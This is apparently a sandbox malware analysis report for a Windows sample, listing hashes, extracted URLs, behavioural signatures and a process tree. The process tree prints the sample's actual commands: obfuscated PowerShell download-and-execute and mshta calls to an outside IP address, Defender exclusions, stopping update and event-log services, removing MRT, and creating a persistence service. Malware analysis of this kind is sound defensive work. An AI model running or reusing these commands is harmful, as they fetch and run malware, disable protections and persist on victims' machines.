Analysis
-
max time kernel
150s -
max time network
133s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
21-11-2024 19:11
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
file.exe
Resource
win10v2004-20241007-en
General
-
Target
file.exe
-
Size
50KB
-
MD5
666248c216a3f63828f739839230f9f6
-
SHA1
13690837235053762a538b4c5b2b601ec9f6bb22
-
SHA256
00655d1ac19f7ffeab812a77f9b85f07fced78e7eb27c641b0e0ce25f16963da
-
SHA512
37e57468a080dbb33ee480ae63d80939ff06050035f168630ba1d8e220e1b4859f78f897a12ba83a514bc97ed7927ee01c6fcca67fbaf479294a529302f7bdde
-
SSDEEP
768:CT6n3V7i+V39HhHw98cje6O7UgYWE8knmbN8vnoK:7i+/BHw98cyoWE8ks8vnp
Malware Config
Extracted
http://176.113.115.178/FF/2.png
Extracted
http://176.113.115.178/FF/3.png
Extracted
http://176.113.115.178/Windows-Update
Extracted
http://176.113.115.178/FF/1.png
Signatures
-
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP svchost.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection svchost.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" powershell.exe -
Blocklisted process makes network request 4 IoCs
flow pid Process 5 2748 powershell.exe 6 2724 powershell.exe 8 2708 mshta.exe 10 2416 powershell.exe -
pid Process 2724 powershell.exe 2748 powershell.exe 2416 powershell.exe 1724 powershell.exe 1544 powershell.exe 2544 powershell.exe -
Creates new service(s) 2 TTPs
-
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\LIB\ImagePath = "C:\\ProgramData\\Mig\\Mig.exe" services.exe -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Mig.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Mig.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion LB31.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion LB31.exe -
Executes dropped EXE 2 IoCs
pid Process 816 LB31.exe 2068 Mig.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Setup.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx svchost.exe -
Loads dropped DLL 2 IoCs
pid Process 2416 powershell.exe 476 services.exe -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 1236 powercfg.exe 1500 powercfg.exe 2304 powercfg.exe 1444 powercfg.exe 2916 powercfg.exe 2948 powercfg.exe 908 powercfg.exe 308 powercfg.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe LB31.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe Mig.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 816 set thread context of 2444 816 LB31.exe 67 PID 2068 set thread context of 2200 2068 Mig.exe 98 PID 2068 set thread context of 1576 2068 Mig.exe 102 PID 2068 set thread context of 2136 2068 Mig.exe 103 -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\wusa.lock wusa.exe File opened for modification C:\Windows\appcompat\programs\RecentFileCache.bcf svchost.exe File created C:\Windows\wusa.lock wusa.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1088 sc.exe 2060 sc.exe 2096 sc.exe 1572 sc.exe 628 sc.exe 2040 sc.exe 3004 sc.exe 1928 sc.exe 1652 sc.exe 3028 sc.exe 1932 sc.exe 1600 sc.exe 2040 sc.exe 2496 sc.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 2876 ipconfig.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 2020c54c493cdb01 powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2724 powershell.exe 2748 powershell.exe 2724 powershell.exe 2724 powershell.exe 2416 powershell.exe 1724 powershell.exe 2416 powershell.exe 2416 powershell.exe 816 LB31.exe 1544 powershell.exe 816 LB31.exe 816 LB31.exe 816 LB31.exe 816 LB31.exe 816 LB31.exe 816 LB31.exe 816 LB31.exe 816 LB31.exe 816 LB31.exe 816 LB31.exe 816 LB31.exe 816 LB31.exe 2444 dialer.exe 2444 dialer.exe 2444 dialer.exe 2444 dialer.exe 2444 dialer.exe 2444 dialer.exe 816 LB31.exe 2444 dialer.exe 2444 dialer.exe 2444 dialer.exe 2444 dialer.exe 816 LB31.exe 816 LB31.exe 2444 dialer.exe 2444 dialer.exe 2444 dialer.exe 2444 dialer.exe 2444 dialer.exe 2444 dialer.exe 2444 dialer.exe 2444 dialer.exe 2444 dialer.exe 2444 dialer.exe 2068 Mig.exe 2444 dialer.exe 2444 dialer.exe 2544 powershell.exe 2444 dialer.exe 2444 dialer.exe 2444 dialer.exe 2444 dialer.exe 2068 Mig.exe 2068 Mig.exe 2068 Mig.exe 2068 Mig.exe 2068 Mig.exe 2068 Mig.exe 2444 dialer.exe 2444 dialer.exe 2068 Mig.exe 2068 Mig.exe 2068 Mig.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2724 powershell.exe Token: SeDebugPrivilege 2748 powershell.exe Token: SeDebugPrivilege 2416 powershell.exe Token: SeDebugPrivilege 1724 powershell.exe Token: SeDebugPrivilege 1544 powershell.exe Token: SeDebugPrivilege 2444 dialer.exe Token: SeShutdownPrivilege 2304 powercfg.exe Token: SeShutdownPrivilege 1236 powercfg.exe Token: SeShutdownPrivilege 1500 powercfg.exe Token: SeShutdownPrivilege 308 powercfg.exe Token: SeAuditPrivilege 828 svchost.exe Token: SeDebugPrivilege 2544 powershell.exe Token: SeDebugPrivilege 2200 dialer.exe Token: SeShutdownPrivilege 1444 powercfg.exe Token: SeShutdownPrivilege 908 powercfg.exe Token: SeShutdownPrivilege 2916 powercfg.exe Token: SeShutdownPrivilege 2948 powercfg.exe Token: SeLockMemoryPrivilege 2136 dialer.exe Token: SeAssignPrimaryTokenPrivilege 828 svchost.exe Token: SeIncreaseQuotaPrivilege 828 svchost.exe Token: SeSecurityPrivilege 828 svchost.exe Token: SeTakeOwnershipPrivilege 828 svchost.exe Token: SeLoadDriverPrivilege 828 svchost.exe Token: SeSystemtimePrivilege 828 svchost.exe Token: SeBackupPrivilege 828 svchost.exe Token: SeRestorePrivilege 828 svchost.exe Token: SeShutdownPrivilege 828 svchost.exe Token: SeSystemEnvironmentPrivilege 828 svchost.exe Token: SeUndockPrivilege 828 svchost.exe Token: SeManageVolumePrivilege 828 svchost.exe Token: SeAssignPrimaryTokenPrivilege 828 svchost.exe Token: SeIncreaseQuotaPrivilege 828 svchost.exe Token: SeSecurityPrivilege 828 svchost.exe Token: SeTakeOwnershipPrivilege 828 svchost.exe Token: SeLoadDriverPrivilege 828 svchost.exe Token: SeSystemtimePrivilege 828 svchost.exe Token: SeBackupPrivilege 828 svchost.exe Token: SeRestorePrivilege 828 svchost.exe Token: SeShutdownPrivilege 828 svchost.exe Token: SeSystemEnvironmentPrivilege 828 svchost.exe Token: SeUndockPrivilege 828 svchost.exe Token: SeManageVolumePrivilege 828 svchost.exe Token: SeAssignPrimaryTokenPrivilege 828 svchost.exe Token: SeIncreaseQuotaPrivilege 828 svchost.exe Token: SeSecurityPrivilege 828 svchost.exe Token: SeTakeOwnershipPrivilege 828 svchost.exe Token: SeLoadDriverPrivilege 828 svchost.exe Token: SeSystemtimePrivilege 828 svchost.exe Token: SeBackupPrivilege 828 svchost.exe Token: SeRestorePrivilege 828 svchost.exe Token: SeShutdownPrivilege 828 svchost.exe Token: SeSystemEnvironmentPrivilege 828 svchost.exe Token: SeUndockPrivilege 828 svchost.exe Token: SeManageVolumePrivilege 828 svchost.exe Token: SeAssignPrimaryTokenPrivilege 828 svchost.exe Token: SeIncreaseQuotaPrivilege 828 svchost.exe Token: SeSecurityPrivilege 828 svchost.exe Token: SeTakeOwnershipPrivilege 828 svchost.exe Token: SeLoadDriverPrivilege 828 svchost.exe Token: SeSystemtimePrivilege 828 svchost.exe Token: SeBackupPrivilege 828 svchost.exe Token: SeRestorePrivilege 828 svchost.exe Token: SeShutdownPrivilege 828 svchost.exe Token: SeSystemEnvironmentPrivilege 828 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1476 wrote to memory of 2364 1476 file.exe 30 PID 1476 wrote to memory of 2364 1476 file.exe 30 PID 1476 wrote to memory of 2364 1476 file.exe 30 PID 2364 wrote to memory of 2724 2364 wscript.exe 31 PID 2364 wrote to memory of 2724 2364 wscript.exe 31 PID 2364 wrote to memory of 2724 2364 wscript.exe 31 PID 2364 wrote to memory of 2748 2364 wscript.exe 33 PID 2364 wrote to memory of 2748 2364 wscript.exe 33 PID 2364 wrote to memory of 2748 2364 wscript.exe 33 PID 2724 wrote to memory of 2584 2724 powershell.exe 35 PID 2724 wrote to memory of 2584 2724 powershell.exe 35 PID 2724 wrote to memory of 2584 2724 powershell.exe 35 PID 2584 wrote to memory of 2060 2584 WScript.exe 37 PID 2584 wrote to memory of 2060 2584 WScript.exe 37 PID 2584 wrote to memory of 2060 2584 WScript.exe 37 PID 2060 wrote to memory of 2708 2060 cmd.exe 39 PID 2060 wrote to memory of 2708 2060 cmd.exe 39 PID 2060 wrote to memory of 2708 2060 cmd.exe 39 PID 2748 wrote to memory of 2876 2748 powershell.exe 40 PID 2748 wrote to memory of 2876 2748 powershell.exe 40 PID 2748 wrote to memory of 2876 2748 powershell.exe 40 PID 2708 wrote to memory of 2416 2708 mshta.exe 41 PID 2708 wrote to memory of 2416 2708 mshta.exe 41 PID 2708 wrote to memory of 2416 2708 mshta.exe 41 PID 2416 wrote to memory of 1724 2416 powershell.exe 43 PID 2416 wrote to memory of 1724 2416 powershell.exe 43 PID 2416 wrote to memory of 1724 2416 powershell.exe 43 PID 2416 wrote to memory of 816 2416 powershell.exe 44 PID 2416 wrote to memory of 816 2416 powershell.exe 44 PID 2416 wrote to memory of 816 2416 powershell.exe 44 PID 1088 wrote to memory of 1632 1088 cmd.exe 53 PID 1088 wrote to memory of 1632 1088 cmd.exe 53 PID 1088 wrote to memory of 1632 1088 cmd.exe 53 PID 816 wrote to memory of 2444 816 LB31.exe 67 PID 816 wrote to memory of 2444 816 LB31.exe 67 PID 816 wrote to memory of 2444 816 LB31.exe 67 PID 816 wrote to memory of 2444 816 LB31.exe 67 PID 816 wrote to memory of 2444 816 LB31.exe 67 PID 816 wrote to memory of 2444 816 LB31.exe 67 PID 816 wrote to memory of 2444 816 LB31.exe 67 PID 2444 wrote to memory of 420 2444 dialer.exe 5 PID 2444 wrote to memory of 476 2444 dialer.exe 6 PID 2444 wrote to memory of 484 2444 dialer.exe 7 PID 2444 wrote to memory of 492 2444 dialer.exe 8 PID 2444 wrote to memory of 588 2444 dialer.exe 9 PID 2444 wrote to memory of 668 2444 dialer.exe 10 PID 2444 wrote to memory of 740 2444 dialer.exe 11 PID 2444 wrote to memory of 800 2444 dialer.exe 12 PID 2444 wrote to memory of 828 2444 dialer.exe 13 PID 2444 wrote to memory of 952 2444 dialer.exe 15 PID 2444 wrote to memory of 236 2444 dialer.exe 16 PID 2444 wrote to memory of 1012 2444 dialer.exe 17 PID 2444 wrote to memory of 900 2444 dialer.exe 18 PID 2444 wrote to memory of 1104 2444 dialer.exe 19 PID 2444 wrote to memory of 1160 2444 dialer.exe 20 PID 2444 wrote to memory of 1184 2444 dialer.exe 21 PID 2444 wrote to memory of 1228 2444 dialer.exe 23 PID 2444 wrote to memory of 1520 2444 dialer.exe 25 PID 2444 wrote to memory of 2056 2444 dialer.exe 26 PID 2444 wrote to memory of 1912 2444 dialer.exe 27 PID 2444 wrote to memory of 3056 2444 dialer.exe 36 PID 2444 wrote to memory of 816 2444 dialer.exe 44 PID 2444 wrote to memory of 2304 2444 dialer.exe 60 PID 2444 wrote to memory of 1500 2444 dialer.exe 61
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:420
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵
- Sets service image path in registry
- Loads dropped DLL
PID:476 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵PID:588
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}3⤵PID:1520
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding3⤵
- Checks processor information in registry
PID:3056
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:668
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
- Modifies security service
- Indicator Removal: Clear Windows Event Logs
PID:740
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:800
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵PID:1160
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:828
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵PID:952
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵PID:236
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵PID:1012
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵PID:900
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵PID:1104
-
-
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"2⤵PID:1228
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵PID:2056
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵PID:1912
-
-
C:\ProgramData\Mig\Mig.exeC:\ProgramData\Mig\Mig.exe2⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:2068 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2544
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart3⤵PID:2212
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart4⤵
- Drops file in Windows directory
PID:2412
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc3⤵
- Launches sc.exe
PID:2060
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2496
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv3⤵
- Launches sc.exe
PID:1572
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits3⤵
- Launches sc.exe
PID:1652
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc3⤵
- Launches sc.exe
PID:2096
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:908
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2948
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2916
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1444
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2200
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe3⤵PID:1576
-
-
C:\Windows\system32\dialer.exedialer.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2136
-
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:484
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:492
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1184
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1476 -
C:\Windows\system32\wscript.exe"wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js3⤵
- Suspicious use of WriteProcessMemory
PID:2364 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2724 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CMD.vbs"5⤵
- Suspicious use of WriteProcessMemory
PID:2584 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c mshta http://176.113.115.178/Windows-Update6⤵
- Suspicious use of WriteProcessMemory
PID:2060 -
C:\Windows\system32\mshta.exemshta http://176.113.115.178/Windows-Update7⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X8⤵
- UAC bypass
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2416 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1724
-
-
C:\Users\Admin\AppData\Roaming\LB31.exe"C:\Users\Admin\AppData\Roaming\LB31.exe"9⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:816 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force10⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1544
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart10⤵
- Suspicious use of WriteProcessMemory
PID:1088 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart11⤵
- Drops file in Windows directory
PID:1632
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc10⤵
- Launches sc.exe
PID:628
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc10⤵
- Launches sc.exe
PID:3028
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv10⤵
- Launches sc.exe
PID:2040
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits10⤵
- Launches sc.exe
PID:1932
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc10⤵
- Launches sc.exe
PID:3004
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 010⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2304
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 010⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1500
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 010⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1236
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 010⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:308
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe10⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2444
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "LIB"10⤵
- Launches sc.exe
PID:1600
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto"10⤵
- Launches sc.exe
PID:1928
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog10⤵
- Launches sc.exe
PID:2040
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "LIB"10⤵
- Launches sc.exe
PID:1088
-
-
-
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2748 -
C:\Windows\system32\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /flushdns5⤵
- Gathers network information
PID:2876
-
-
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "801325826392213766-684801762-1514971320-3167538293504300531048228479-594169369"1⤵PID:748
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-469403973-195241372311397752938903216760427271523894250-1822948152388675340"1⤵PID:876
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1523105627157793749218311390-1581607404-196312157719098908026944710692050083376"1⤵PID:872
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1329467824-1414799993172582698947069995-26073194845582170620347478321547740039"1⤵PID:1700
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1233678843-12358472911183455941-1089575767-10829828292090969313-865768296-1514755288"1⤵PID:2832
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1073836127117207565812143415521077113278-1878961076-183311156-13669789571473316583"1⤵PID:1792
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-255934328-6843181432057467296-778761170-26448962310547516411389132376-822758601"1⤵PID:1480
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-14290032001977581502-1167130930804857847-1050591789-1248000509-116033514-1833686141"1⤵PID:680
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-21178246444043026041035671815-1639937368649279741-1203930188652175147-1808066143"1⤵PID:2924
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-736384577436726691618780492626376882135870672353787918398958935-1296483512"1⤵PID:2288
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
3JavaScript
1PowerShell
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Power Settings
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD582f229d0c36b68073da70ef5958e425d
SHA12beb8cd227b49b1d119165d6e3d258ddb730387a
SHA2560f2579fdb9cbaaec15015df17dbaafd73a9d7d3202321aba6a1c8479cac17394
SHA5124553f11b61e2c1cb1ebf532e7417380a8a5c19121331b76894bf5d3605a905fa3f62b54d596a818709f28c49fd7eb1d880798907a84cac45ccff65ee93f9e970
-
Filesize
27KB
MD5238ec4d17050e1841e8e0171407c2260
SHA12c8c14b257641f1e1151c6303dabde01621314f2
SHA256163c4066da47b2e8b7d3690a374c79856417de2e09c74c0e7c807cd0b5c4b8fb
SHA5123eaa1ebca8b9ad021342846040faf19c5ef420c319a9a649b31ffb9107b54d71f60f6e4372e0256f123b931f5c3dd11a34ad9c4ccb7d0a3c687a90ba50cd2102
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD57318eaa35e34d1bbf4e064218747b9bc
SHA1062dc8d401554ad1235e277682b5535958d20549
SHA2565fafb8b714d770e479639e34e66b01c2455c348d78f2dde3445bbc0158a5086d
SHA512a5cc2603ccae43a53215ec26032290f22d57df3647e980fec72b00bbe48b9d53b4f7e20d57f1bca114eb5e40a7cd407aaeaf9a3057f1964b5e5c469b85a67d7f
-
Filesize
7.3MB
MD5c9e6aa21979d5fc710f1f2e8226d9dfe
SHA1d881f97a1fe03f43bed2a9609eae65531cf710cf
